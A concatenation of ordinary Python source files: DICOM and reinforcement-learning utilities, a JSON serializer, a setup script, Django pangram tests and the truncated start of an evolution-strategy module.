3a862c1dfb4c8e4aff3392df9183017ab88ec2ab | 775 | py | Python | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | 1 | 2020-08-03T12:27:02.000Z | 2020-08-03T12:27:02.000Z | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | null | null | null | umtk/image/utils.py | kyle0x54/umtk | 883090d84fce924e65184847e6b3048014616f5d | [
"Apache-2.0"
] | 1 | 2020-11-28T03:27:10.000Z | 2020-11-28T03:27:10.000Z | import os
from pathlib import Path
from typing import Any, Dict, Union
import numpy as np
def isdicom(path: Union[str, Path]) -> bool:
""" Judge whether a given file is a valid dicom.
Args:
path: given file path.
Returns:
True if given path is a valid dicom, otherwise False.
"""
if not os.path.isfile(path):
return False
# read preamble and magic code
with open(path, "rb") as f:
header = f.read(132)
if not header:
return False
# magic code of a dicom file should be "DICM"
return False if header[128:132] != b"DICM" else True
def get_reorient_image(vtd: Dict[str, Any]) -> np.ndarray:
return np.flip(
vtd["image_zyx"],
np.where(vtd["direction_zyx"] < 0)[0]
)
| 22.142857 | 61 | 0.618065 |
3a866ce737d90dd7710156bcd56f1d122772201c | 28,704 | py | Python | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | 23 | 2019-04-04T17:34:56.000Z | 2021-12-14T19:34:10.000Z | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | null | null | null | tf_rl/common/utils.py | Rowing0914/TF_RL | 68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7 | [
"MIT"
] | 3 | 2019-07-17T23:56:36.000Z | 2022-03-13T03:55:21.000Z | import tensorflow as tf
import numpy as np
import os, datetime, itertools, shutil, gym, sys
from tf_rl.common.visualise import plot_Q_values
from tf_rl.common.wrappers import MyWrapper, CartPole_Pixel, wrap_deepmind, make_atari
"""
TF basic Utility functions
"""
def eager_setup():
"""
it eables an eager execution in tensorflow with config that allows us to flexibly access to a GPU
from multiple python scripts
:return:
"""
config = tf.compat.v1.ConfigProto(allow_soft_placement=True,
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1)
config.gpu_options.allow_growth = True
tf.compat.v1.enable_eager_execution(config=config)
tf.compat.v1.enable_resource_variables()
"""
Common Utility functions
"""
def get_alg_name():
"""Returns the name of the algorithm.
We assume that the directory architecutre for that algo looks like below
- Atari: `examples/algo_name/algo_name_eager.py`
- Cartpole: `examples/algo_name/algo_name_eager_cartpole.py`
* where algo_name must be uppercase/capital letters!!
"""
alg_name = sys.argv[0].rsplit("/")[-1].rsplit(".")[0].replace("_eager", "")
return alg_name
def invoke_agent_env(params, alg):
"""Returns the wrapped env and string name of agent, then Use `eval(agent)` to activate it from main script
"""
if params.mode == "Atari":
env = wrap_deepmind(make_atari("{}NoFrameskip-v4".format(params.env_name, skip_frame_k=params.skip_frame_k)),
skip_frame_k=params.skip_frame_k)
if params.debug_flg:
agent = "{}_debug".format(alg)
else:
agent = "{}".format(alg)
else:
agent = "{}".format(alg)
if params.mode == "CartPole":
env = MyWrapper(gym.make("CartPole-v0"))
elif params.mode == "CartPole-p":
env = CartPole_Pixel(gym.make("CartPole-v0"))
return agent, env
def create_log_model_directory(params, alg):
"""
Create a directory for log/model
this is compatible with Google colab and can connect to MyDrive through the authorisation step
:param params:
:return:
"""
if params.mode in ["Atari", "atari", "MuJoCo", "mujoco"]:
second_name = params.env_name
else:
second_name = params.mode
now = datetime.datetime.now()
if params.google_colab:
# mount the MyDrive on google drive and create the log directory for saving model and logging using tensorboard
params.log_dir, params.model_dir, params.log_dir_colab, params.model_dir_colab = _setup_on_colab(alg,
params.mode)
else:
if params.debug_flg:
params.log_dir = "../../logs/logs/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}_debug/".format(alg,
second_name)
params.model_dir = "../../logs/models/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}_debug/".format(alg,
second_name)
else:
params.log_dir = "../../logs/logs/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}/".format(alg, second_name)
params.model_dir = "../../logs/models/" + now.strftime("%Y%m%d-%H%M%S") + "-{}_{}/".format(alg, second_name)
return params
def create_loss_func(loss_name="mse"):
if loss_name == "huber":
loss_fn = tf.compat.v1.losses.huber_loss
elif loss_name == "mse":
loss_fn = tf.compat.v1.losses.mean_squared_error
else:
assert False, "Choose the loss_fn from either huber or mse"
return loss_fn
def get_ready(params):
"""
Print out the content of params
:param params:
:return:
"""
for key, item in vars(params).items():
print(key, " : ", item)
def create_checkpoint(model, optimizer, model_dir):
"""
Create a checkpoint for managing a model
:param model:
:param optimizer:
:param model_dir:
:return:
"""
checkpoint_dir = model_dir
check_point = tf.train.Checkpoint(optimizer=optimizer,
model=model,
optimizer_step=tf.compat.v1.train.get_or_create_global_step())
manager = tf.train.CheckpointManager(check_point, checkpoint_dir, max_to_keep=3)
# try re-loading the previous training progress!
try:
print("Try loading the previous training progress")
check_point.restore(manager.latest_checkpoint)
assert tf.compat.v1.train.get_global_step().numpy() != 0
print("===================================================\n")
print("Restored the model from {}".format(checkpoint_dir))
print("Currently we are on time-step: {}".format(tf.compat.v1.train.get_global_step().numpy()))
print("\n===================================================")
except:
print("===================================================\n")
print("Previous Training files are not found in Directory: {}".format(checkpoint_dir))
print("\n===================================================")
return manager
def _setup_on_colab(alg_name, env_name):
"""
Mount MyDrive to current instance through authentication of Google account
Then use it as a backup of training related files
:param env_name:
:return:
"""
# mount your drive on google colab
from google.colab import drive
drive.mount("/content/gdrive")
log_dir = "/content/TF_RL/logs/logs/{}/{}".format(alg_name, env_name)
model_dir = "/content/TF_RL/logs/models/{}/{}".format(alg_name, env_name)
log_dir_colab = "/content/gdrive/My Drive/logs/logs/{}/{}".format(alg_name, env_name)
model_dir_colab = "/content/gdrive/My Drive/logs/models/{}/{}".format(alg_name, env_name)
# create the logs directory under the root dir
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if not os.path.isdir(model_dir):
os.makedirs(model_dir)
# if the previous directory existed in My Drive, then we would continue training on top of the previous training
if os.path.isdir(log_dir_colab):
print("=== {} IS FOUND ===".format(log_dir_colab))
copy_dir(log_dir_colab, log_dir, verbose=True)
else:
print("=== {} IS NOT FOUND ===".format(log_dir_colab))
os.makedirs(log_dir_colab)
print("=== FINISHED CREATING THE DIRECTORY ===")
if os.path.isdir(model_dir_colab):
print("=== {} IS FOUND ===".format(model_dir_colab))
copy_dir(model_dir_colab, model_dir, verbose=True)
else:
print("=== {} IS NOT FOUND ===".format(model_dir_colab))
os.makedirs(model_dir_colab)
print("=== FINISHED CREATING THE DIRECTORY ===")
return log_dir, model_dir, log_dir_colab, model_dir_colab
class AnnealingSchedule:
"""
Scheduling the gradually decreasing value, e.g., epsilon or beta params
"""
def __init__(self, start=1.0, end=0.1, decay_steps=500, decay_type="linear"):
self.start = start
self.end = end
self.decay_steps = decay_steps
self.annealed_value = np.linspace(start, end, decay_steps)
self.decay_type = decay_type
def old_get_value(self, timestep):
"""
Deprecated
:param timestep:
:return:
"""
if self.decay_type == "linear":
return self.annealed_value[min(timestep, self.decay_steps) - 1]
# don't use this!!
elif self.decay_type == "curved":
if timestep < self.decay_steps:
return self.start * 0.9 ** (timestep / self.decay_steps)
else:
return self.end
def get_value(self):
timestep = tf.train.get_or_create_global_step() # we are maintaining the global-step in train.py so it is accessible
if self.decay_type == "linear":
return self.annealed_value[min(timestep.numpy(), self.decay_steps) - 1]
# don't use this!!
elif self.decay_type == "curved":
if timestep.numpy() < self.decay_steps:
return self.start * 0.9 ** (timestep.numpy() / self.decay_steps)
else:
return self.end
def copy_dir(src, dst, symlinks=False, ignore=None, verbose=False):
"""
copy the all contents in `src` directory to `dst` directory
Usage:
```python
delete_files("./bb/")
```
"""
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if verbose:
print("From:{}, To: {}".format(s, d))
if os.path.isdir(s):
shutil.copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
def delete_files(folder, verbose=False):
"""
delete the all contents in `folder` directory
Usage:
```python
copy_dir("./aa/", "./bb/")
```
"""
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
if verbose:
print("{} has been deleted".format(file_path))
except Exception as e:
print(e)
class RunningMeanStd:
"""
Running Mean and Standard Deviation for normalising the observation!
This is mainly used in MuJoCo experiments, e.g. DDPG!
Formula:
- Normalisation: y = (x-mean)/std
"""
def __init__(self, shape, clip_range=5, epsilon=1e-2):
self.size = shape
self.epsilon = epsilon
self.clip_range = clip_range
self._sum = 0.0
self._sumsq = np.ones(self.size, np.float32) * epsilon
self._count = np.ones(self.size, np.float32) * epsilon
self.mean = self._sum / self._count
self.std = np.sqrt(np.maximum(self._sumsq / self._count - np.square(self.mean), np.square(self.epsilon)))
def update(self, x):
"""
update the mean and std by given input
:param x: can be observation, reward, or action!!
:return:
"""
x = x.reshape(-1, self.size)
self._sum = x.sum(axis=0)
self._sumsq = np.square(x).sum(axis=0)
self._count = np.array([len(x)], dtype='float64')
self.mean = self._sum / self._count
self.std = np.sqrt(np.maximum(self._sumsq / self._count - np.square(self.mean), np.square(self.epsilon)))
def normalise(self, x):
"""
Using well-maintained mean and std, we normalise the input followed by update them.
:param x:
:return:
"""
result = np.clip((x - self.mean) / self.std, -self.clip_range, self.clip_range)
return result
def test(sess, agent, env, params):
xmax = agent.num_action
ymax = 3
print("\n ===== TEST STARTS: {0} Episodes ===== \n".format(params.test_episodes))
for i in range(params.test_episodes):
state = env.reset()
for t in itertools.count():
env.render()
q_values = sess.run(agent.pred, feed_dict={agent.state: state.reshape(params.state_reshape)})[0]
action = np.argmax(q_values)
plot_Q_values(q_values, xmax=xmax, ymax=ymax)
obs, reward, done, _ = env.step(action)
state = obs
if done:
print("Episode finished after {} timesteps".format(t + 1))
break
return
class logger:
def __init__(self, params):
self.params = params
self.prev_update_step = 0
def logging(self, time_step, current_episode, exec_time, reward_buffer, loss, epsilon, cnt_action):
"""
Logging function
:param time_step:
:param max_steps:
:param current_episode:
:param exec_time:
:param reward:
:param loss:
:param cnt_action:
:return:
"""
cnt_actions = dict((x, cnt_action.count(x)) for x in set(cnt_action))
episode_steps = time_step - self.prev_update_step
# remaing_time_step/exec_time_for_one_step
remaining_time = str(datetime.timedelta(
seconds=(self.params.num_frames - time_step) * exec_time / (episode_steps)))
print(
"{0}/{1}: Ep: {2}({3:.1f} fps), Remaining: {4}, (R) {5} Ep => [MEAN: {6:.3f}, MAX: {7:.3f}], (last ep) Loss: {8:.3f}, Eps: {9:.3f}, Act: {10}".format(
time_step, self.params.num_frames, current_episode, episode_steps / exec_time, remaining_time,
self.params.reward_buffer_ep, np.mean(reward_buffer), np.max(reward_buffer), loss,
epsilon, cnt_actions
))
self.prev_update_step = time_step
"""
Algorithm Specific Utility functions
"""
class her_sampler:
# borrow from: https://github.com/TianhongDai/hindsight-experience-replay/blob/master/her.py
def __init__(self, replay_strategy, replay_k, reward_func=None):
self.replay_strategy = replay_strategy
self.replay_k = replay_k
if self.replay_strategy == 'future':
self.future_p = 1 - (1. / (1 + replay_k))
else:
self.future_p = 0
self.reward_func = reward_func
def sample_her_transitions(self, episode_batch, batch_size_in_transitions):
T = episode_batch['actions'].shape[1]
rollout_batch_size = episode_batch['actions'].shape[0]
batch_size = batch_size_in_transitions
# select which rollouts and which timesteps to be used
episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
t_samples = np.random.randint(T, size=batch_size)
transitions = {key: episode_batch[key][episode_idxs, t_samples].copy() for key in episode_batch.keys()}
# her idx
her_indexes = np.where(np.random.uniform(size=batch_size) < self.future_p)
future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
future_offset = future_offset.astype(int)
future_t = (t_samples + 1 + future_offset)[her_indexes]
# replace go with achieved goal
future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
transitions['g'][her_indexes] = future_ag
# to get the params to re-compute reward
transitions['r'] = np.expand_dims(self.reward_func(transitions['ag_next'], transitions['g'], None), 1)
transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:]) for k in transitions.keys()}
return transitions
def action_postprocessing(action, params):
action += params.noise_eps * params.max_action * np.random.randn(*action.shape)
action = np.clip(action, -params.max_action, params.max_action)
# random actions...
random_actions = np.random.uniform(low=-params.max_action,
high=params.max_action,
size=params.num_action)
# choose if use the random actions
action += np.random.binomial(1, params.random_eps, 1)[0] * (random_actions - action)
return action
def state_unpacker(state):
"""
Given the dictionary of state, it unpacks and returns processed items as numpy.ndarray
Sample input:
{'observation': array([ 1.34193265e+00, 7.49100375e-01, 5.34722720e-01, 1.30179339e+00, 8.86399624e-01,
4.24702091e-01, -4.01392554e-02, 1.37299250e-01, -1.10020629e-01, 2.91834773e-06,
-4.72661656e-08, -3.85214084e-07, 5.92637053e-07, 1.12208536e-13, -7.74656889e-06,
-7.65027248e-08, 4.92570535e-05, 1.88857148e-07, -2.90549459e-07, -1.18156686e-18,
7.73934983e-06, 7.18103404e-08, -2.42928780e-06, 4.93607091e-07, 1.70999820e-07]),
'achieved_goal': array([1.30179339, 0.88639962, 0.42470209]),
'desired_goal': array([1.4018907 , 0.62021174, 0.4429846 ])}
:param state:
:return:
"""
obs = np.array(state["observation"])
achieved_goal = np.array(state["achieved_goal"])
desired_goal = np.array(state["desired_goal"])
remaining_goal = simple_goal_subtract(desired_goal, achieved_goal)
return obs, achieved_goal, desired_goal, remaining_goal
def simple_goal_subtract(goal, achieved_goal):
"""
We subtract the achieved goal from the desired one to see how much we are still far from the desired position
"""
assert goal.shape == achieved_goal.shape
return goal - achieved_goal
ALIVE_BONUS = 1.0
def get_distance(env_name):
"""
This returns the distance according to the implementation of env
For instance, halfcheetah and humanoid have the different way to return the distance
so that we need to deal with them accordingly.
:return: func to calculate the distance(float)
"""
obj_name = env_name.split("-")[0]
if not obj_name.find("Ant") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/ant.py#L14
distance = info["reward_forward"]
return distance
elif not obj_name.find("HalfCheetah") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/half_cheetah.py
distance = info["reward_run"]
return distance
elif not obj_name.find("Hopper") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/hopper.py#L15
distance = (reward - ALIVE_BONUS) + 1e-3 * np.square(action).sum()
return distance
elif not obj_name.find("Humanoid") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/humanoid.py#L30
distance = info["reward_linvel"] / 1.25
return distance
elif not obj_name.find("Swimmer") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/swimmer.py#L15
distance = info["reward_fwd"]
return distance
elif not obj_name.find("Walker2d") == -1:
def func(action, reward, info):
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/walker2d.py#L16 -> original version
distance = (reward - ALIVE_BONUS) + 1e-3 * np.square(action).sum()
# https://github.com/openai/gym/blob/master/gym/envs/mujoco/walker2d_v3.py#L90 -> version 3.0
# distance = info["x_velocity"]
return distance
elif not obj_name.find("Centipede") == -1:
def func(action, reward, info):
distance = info["reward_forward"]
return distance
else:
assert False, "This env: {} is not supported yet.".format(env_name)
return func
"""
TODO: I think I will remove this.
# Copyright 2018 The Dopamine Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
===== Tracker is A class for storing iteration-specific metrics. ====
"""
class Tracker(object):
"""A class for storing iteration-specific metrics.
The internal format is as follows: we maintain a mapping from keys to lists.
Each list contains all the values corresponding to the given key.
For example, self.data_lists['train_episode_returns'] might contain the
per-episode returns achieved during this iteration.
Attributes:
data_lists: dict mapping each metric_name (str) to a list of said metric
across episodes.
"""
def __init__(self):
self.data_lists = {}
def append(self, data_pairs):
"""Add the given values to their corresponding key-indexed lists.
Args:
data_pairs: A dictionary of key-value pairs to be recorded.
"""
for key, value in data_pairs.items():
if key not in self.data_lists:
self.data_lists[key] = []
self.data_lists[key].append(value)
"""
Update methods
"""
def sync_main_target(sess, target, source):
"""
Synchronise the models
from Denny Britz's excellent RL repo
https://github.com/dennybritz/reinforcement-learning/blob/master/DQN/Double%20DQN%20Solution.ipynb
:param main:
:param target:
:return:
"""
source_params = [t for t in tf.trainable_variables() if t.name.startswith(source.scope)]
source_params = sorted(source_params, key=lambda v: v.name)
target_params = [t for t in tf.trainable_variables() if t.name.startswith(target.scope)]
target_params = sorted(target_params, key=lambda v: v.name)
update_ops = []
for target_w, source_w in zip(target_params, source_params):
op = target_w.assign(source_w)
update_ops.append(op)
sess.run(update_ops)
def soft_target_model_update(sess, target, source, tau=1e-2):
"""
Soft update model parameters.
target = tau * source + (1 - tau) * target
:param main:
:param target:
:param tau:
:return:
"""
source_params = [t for t in tf.trainable_variables() if t.name.startswith(source.scope)]
source_params = sorted(source_params, key=lambda v: v.name)
target_params = [t for t in tf.trainable_variables() if t.name.startswith(target.scope)]
target_params = sorted(target_params, key=lambda v: v.name)
update_ops = []
for target_w, source_w in zip(target_params, source_params):
# target = tau * source + (1 - tau) * target
op = target_w.assign(tau * source_w + (1 - tau) * target_w)
update_ops.append(op)
sess.run(update_ops)
@tf.contrib.eager.defun(autograph=False)
def soft_target_model_update_eager(target, source, tau=1e-2):
"""
Soft update model parameters.
target = tau * source + (1 - tau) * target
:param main:
:param target:
:param tau:
:return:
"""
for param, target_param in zip(source.weights, target.weights):
target_param.assign(tau * param + (1 - tau) * target_param)
"""
Gradient Clipping
"""
def gradient_clip_fn(flag=None):
"""
given a flag, create the clipping function and returns it as a function
currently it supports:
- by_value
- norm
- None
:param flag:
:return:
"""
if flag == "":
def _func(grads):
return grads
elif flag == "by_value":
def _func(grads):
grads = [ClipIfNotNone(grad, -1., 1.) for grad in grads]
return grads
elif flag == "norm":
def _func(grads):
grads, _ = tf.clip_by_global_norm(grads, 10.0)
return grads
else:
assert False, "Choose the gradient clipping function from by_value, norm, or nothing!"
return _func
def ClipIfNotNone(grad, _min, _max):
"""
Reference: https://stackoverflow.com/a/39295309
:param grad:
:return:
"""
if grad is None:
return grad
return tf.clip_by_value(grad, _min, _max)
"""
Test Methods
"""
def eval_Agent(agent, env, n_trial=1):
"""
Evaluate the trained agent!
:return:
"""
all_rewards = list()
print("=== Evaluation Mode ===")
for ep in range(n_trial):
state = env.reset()
done = False
episode_reward = 0
while not done:
# epsilon-greedy for evaluation using a fixed epsilon of 0.05(Nature does this!)
if np.random.uniform() < 0.05:
action = np.random.randint(agent.num_action)
else:
action = np.argmax(agent.predict(state))
next_state, reward, done, _ = env.step(action)
state = next_state
episode_reward += reward
all_rewards.append(episode_reward)
tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
# if this is running on Google Colab, we would store the log/models to mounted MyDrive
if agent.params.google_colab:
delete_files(agent.params.model_dir_colab)
delete_files(agent.params.log_dir_colab)
copy_dir(agent.params.log_dir, agent.params.log_dir_colab)
copy_dir(agent.params.model_dir, agent.params.model_dir_colab)
if n_trial > 2:
print("=== Evaluation Result ===")
all_rewards = np.array([all_rewards])
print("| Max: {} | Min: {} | STD: {} | MEAN: {} |".format(np.max(all_rewards), np.min(all_rewards),
np.std(all_rewards), np.mean(all_rewards)))
def eval_Agent_DDPG(env, agent, n_trial=1):
"""
Evaluate the trained agent with the recording of its behaviour
:return:
"""
all_distances, all_rewards, all_actions = list(), list(), list()
distance_func = get_distance(agent.params.env_name) # create the distance measure func
print("=== Evaluation Mode ===")
for ep in range(n_trial):
env.record_start()
state = env.reset()
done = False
episode_reward = 0
while not done:
action = agent.eval_predict(state)
# scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
next_state, reward, done, info = env.step(action * env.action_space.high)
distance = distance_func(action, reward, info)
all_actions.append(action.mean() ** 2) # Mean Squared of action values
all_distances.append(distance)
state = next_state
episode_reward += reward
all_rewards.append(episode_reward)
tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
env.record_end()
return all_rewards, all_distances, all_actions
def eval_Agent_TRPO(agent, env, n_trial=1):
"""
Evaluate the trained agent!
:return:
"""
all_rewards = list()
print("=== Evaluation Mode ===")
for ep in range(n_trial):
state = env.reset()
done = False
episode_reward = 0
while not done:
action = agent.predict(state)
# scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
next_state, reward, done, _ = env.step(action)
state = next_state
episode_reward += reward
all_rewards.append(episode_reward)
tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
if n_trial > 2:
print("=== Evaluation Result ===")
all_rewards = np.array([all_rewards])
print("| Max: {} | Min: {} | STD: {} | MEAN: {} |".format(np.max(all_rewards), np.min(all_rewards),
np.std(all_rewards), np.mean(all_rewards)))
def eval_Agent_HER(agent, env, n_trial=1):
"""
Evaluate the trained agent!
:return:
"""
successes = list()
for ep in range(n_trial):
state = env.reset()
# obs, achieved_goal, desired_goal in `numpy.ndarray`
obs, ag, dg, rg = state_unpacker(state)
success = list()
for ts in range(agent.params.num_steps):
# env.render()
action = agent.predict(obs, dg)
# action = action_postprocessing(action, agent.params)
next_state, reward, done, info = env.step(action)
success.append(info.get('is_success'))
# obs, achieved_goal, desired_goal in `numpy.ndarray`
next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
obs = next_obs
dg = next_dg
successes.append(success)
return np.mean(np.array(successes))
| 35.745953 | 162 | 0.610089 |
3a8780a44ac5da348e337c07269fb06faa67e8cd | 2,284 | py | Python | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | 1 | 2017-12-14T05:35:38.000Z | 2017-12-14T05:35:38.000Z | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | from collections import namedtuple, OrderedDict
import json
__author__ = 'kollad'
def isnamedtuple(obj):
"""Heuristic check if an object is a namedtuple."""
return isinstance(obj, tuple) \
and hasattr(obj, "_fields") \
and hasattr(obj, "_asdict") \
and callable(obj._asdict)
def serialize(data):
if data is None or isinstance(data, (bool, int, float, str)):
return data
if isinstance(data, list):
return [serialize(val) for val in data]
if isinstance(data, OrderedDict):
return {"py/collections.OrderedDict":
[[serialize(k), serialize(v)] for k, v in data.items()]}
if isnamedtuple(data):
return {"py/collections.namedtuple": {
"type": type(data).__name__,
"fields": list(data._fields),
"values": [serialize(getattr(data, f)) for f in data._fields]}}
if isinstance(data, dict):
if all(isinstance(k, str) for k in data):
return {k: serialize(v) for k, v in data.items()}
return {"py/dict": [[serialize(k), serialize(v)] for k, v in data.items()]}
if isinstance(data, tuple):
return {"py/tuple": [serialize(val) for val in data]}
if isinstance(data, set):
return {"py/set": [serialize(val) for val in data]}
if isinstance(data, np.ndarray):
return {"py/numpy.ndarray": {
"values": data.tolist(),
"dtype": str(data.dtype)}}
raise TypeError("Type %s not data-serializable" % type(data))
def restore(dct):
if "py/dict" in dct:
return dict(dct["py/dict"])
if "py/tuple" in dct:
return tuple(dct["py/tuple"])
if "py/set" in dct:
return set(dct["py/set"])
if "py/collections.namedtuple" in dct:
data = dct["py/collections.namedtuple"]
return namedtuple(data["type"], data["fields"])(*data["values"])
if "py/numpy.ndarray" in dct:
data = dct["py/numpy.ndarray"]
return np.array(data["values"], dtype=data["dtype"])
if "py/collections.OrderedDict" in dct:
return OrderedDict(dct["py/collections.OrderedDict"])
return dct
def data_to_json(data):
return json.dumps(serialize(data))
def json_to_data(s):
return json.loads(s, object_hook=restore) | 34.606061 | 83 | 0.609019 |
3a8812b8a7ce8889a96abd8e38c4d8b8f1956ab6 | 1,079 | py | Python | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md") as readmeFile:
long_description = readmeFile.read()
setuptools.setup(
name="musketeer",
version="0.0.1",
author="Daniil Soloviev",
author_email="dos23@cam.ac.uk",
description="A tool for fitting data from titration experiments.",
long_description=long_description,
long_description_content_type='text/markdown',
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Chemistry"
],
url="https://github.com/daniilS/Musketeer",
packages=["musketeer"],
package_data={"": ["*.png"]},
include_package_data=True,
install_requires=[
"numpy",
"scipy",
"matplotlib",
"ttkbootstrap",
"tkscrolledframe",
"ttkwidgets"
],
python_requires=">=3"
)
| 29.162162 | 70 | 0.624652 |
3a886dc473f6df44d24e2498829541fd798461f5 | 1,358 | py | Python | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | from django.test import TestCase
# Create your tests here.
from webapp.forms import contains_all_letters
class SCheckerTestCase(TestCase):
def setup(self):
pass
def test_lower_case(self):
text = 'abcdefghijklmnopqrstuvwxyz'
answer = contains_all_letters(text)
self.assertEqual(answer,True)
def test_upper_case(self):
text = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
answer = contains_all_letters(text)
self.assertEqual(answer,True)
def test_mixed_case(self):
text = 'ABCDEFGHijkLMNOPQRSTUVWXYZ'
answer = contains_all_letters(text)
self.assertEqual(answer,True)
def test_special_chars(self):
text = 'abc...DEFGHIJK///LMNOP QR2STU:V""WXYZ'
answer = contains_all_letters(text)
self.assertEqual(answer,True)
def test_sentence(self):
text = 'The quick brown fox jumps over the lazy dog'
answer = contains_all_letters(text)
self.assertEqual(answer,True)
def test_missing_letter(self):
#P is missing
text = 'abc...DEFGHIJK///LMNO QR2STU:V""WXYZ'
answer = contains_all_letters(text)
self.assertEqual(answer,False)
def test_empty(self):
#P is missing
text = ''
answer = contains_all_letters(text)
self.assertEqual(answer,False)
def test_just_special_chars(self):
#P is missing
text = '!@#$%^&*()-=<>?{}|;/.,78900-=<>?{}|;/.,78900'
answer = contains_all_letters(text)
self.assertEqual(answer,False)
| 24.690909 | 55 | 0.734904 |
3a89f586494444a77daa3b34a1bc45b72a73f85e | 16,338 | py | Python | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | 4 | 2020-11-26T16:18:23.000Z | 2021-06-28T08:43:35.000Z | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | null | null | null | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | null | null | null | import copy
import math
import operator
import random
import sys
from concurrent import futures
import numpy as np
import requests
class FitnessFunctionCaller:
"""Class for returning the fitness function of an individual."""
def __init__(self, *args):
functional_parts = []
# Full case with 10 motors
if len(args) > 0:
for arg in args:
functional_parts.append(arg)
def call(self) -> float:
"""Returns the fitness function"""
return 1# Fitness function
class Individual:
"""Candidate solution to the problem. Made by a functional value and a variance."""
def __init__(self, is10, **kwargs):
functional = kwargs.get("functional", None)
variance = kwargs.get("variance", None)
self.is10 = is10
if is10 is False:
self.motorNumber = 4
else:
self.motorNumber = 10
if len(kwargs) == 0:
self.functional = [
np.random.uniform(-180, 181) for _ in range(self.motorNumber)
]
self.variance = [
np.random.uniform(100, 360) for _ in range(self.motorNumber)
]
else:
self.functional = functional
self.variance = variance
self.fitness = sys.float_info.max # irrational high value
def update_fitness(self, incoming):
"""Update fitness function"""
self.fitness = incoming
def update_variance(self, incoming):
"""Update variance function"""
for i in range(self.motorNumber):
self.variance[i] = incoming[i]
class EvolutiveStrategyOneIndividual:
"""Evolution strategy made only one solution with mutation."""
def __init__(self, c, is10):
self.population = 1
self.pool = []
for _ in range(self.population): # reusable for bigger populations
indv = Individual(is10)
self.pool.append(indv)
self.successes = [] # 1 if improves, otherwise 0
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
self.c = c # coefficient for 1/5 rule
self.evaluations = 0
self.lastFitness = sys.float_info.max # irrational high value
def mutation(self):
"""A temporal solution is produced, being the second individual the result of the mutation"""
# Creating temporal dictionaries
